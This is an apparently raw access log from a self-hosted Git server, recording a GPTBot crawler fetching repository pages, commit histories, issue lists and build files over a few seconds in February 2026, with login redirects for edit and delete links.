"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:19:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 10119] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:17:19:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 15417] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:17:19:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:17:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10048] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build" +[17/Feb/2026:17:19:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:17:19:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:17:19:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:17:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:17:19:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:17:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:17:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 9793] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:17:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 17504] [Gzip 8.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:17:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py?display=rendered" [Client 74.7.227.38] [Length 11120] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:17:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 5148] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:17:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 864] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:17:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:17:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9953] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10118] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10652] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10300] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:17:19:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:17:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:17:19:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:17:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:17:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:17:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:17:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10736] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" +[17/Feb/2026:17:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:17:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake" +[17/Feb/2026:17:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14319] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11346] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12780] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10004] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13609] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:19:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" +[17/Feb/2026:17:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm" +[17/Feb/2026:17:19:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" +[17/Feb/2026:17:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm" +[17/Feb/2026:17:19:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" +[17/Feb/2026:17:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm" +[17/Feb/2026:17:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11573] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" +[17/Feb/2026:17:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:17:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10262] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:17:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14599] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:17:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:17:19:26 +0000] - 200 200 - GET https 